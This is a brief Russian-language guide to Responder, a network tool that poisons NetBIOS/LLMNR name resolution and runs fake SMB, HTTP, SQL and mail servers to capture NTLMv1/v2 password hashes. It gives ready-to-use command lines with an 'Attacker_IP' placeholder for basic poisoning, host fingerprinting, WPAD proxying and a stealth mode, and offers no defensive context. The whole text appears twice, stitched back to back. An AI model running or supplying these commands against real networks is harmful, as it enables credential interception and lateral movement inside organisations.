Responder – многофункциональный инструмент сбоевыми возможностями.
По своей сути это утилита для пассивного сбора чувствительных данных.
Responder – это в первую очередь пассивный инструмент, который внимательно слушает трафик на указанном
интерфейсе, анализирует и принимает соответствующие действия в зависимости от опций запуска.
Умеет извлекать NTLM v1 /v2 хеши, запуская для этого свой поддельный SMB сервер.
Так же содержит HTTP и SQL серверы, для схожих целей.
С последними обновлениями добавился целый ряд встроенных почтовых сервисов, таких как pop, imap и smtp.
Пример использования Responder для работы с протоколами NetBIOS и LLMNR:
responder -i Attacker_IP -I eth0
Пример использования Responder с включенным определением хостов:
responder -i Attacker_IP -I eth0 -f On
Пример использования Responder в качестве WPAD прокси:
responder -i Attacker_IP -I eth0 -f On -w
Cтелс режим работы Responder:
responder -i Attacker_IP -I eth0 -A
По своей сути это утилита для пассивного сбора чувствительных данных.
Responder – это в первую очередь пассивный инструмент, который внимательно слушает трафик на указанном
интерфейсе, анализирует и принимает соответствующие действия в зависимости от опций запуска.
Умеет извлекать NTLM v1 /v2 хеши, запуская для этого свой поддельный SMB сервер.
Так же содержит HTTP и SQL серверы, для схожих целей.
С последними обновлениями добавился целый ряд встроенных почтовых сервисов, таких как pop, imap и smtp.
Пример использования Responder для работы с протоколами NetBIOS и LLMNR:
responder -i Attacker_IP -I eth0
Пример использования Responder с включенным определением хостов:
responder -i Attacker_IP -I eth0 -f On
Пример использования Responder в качестве WPAD прокси:
responder -i Attacker_IP -I eth0 -f On -w
Cтелс режим работы Responder:
responder -i Attacker_IP -I eth0 -A
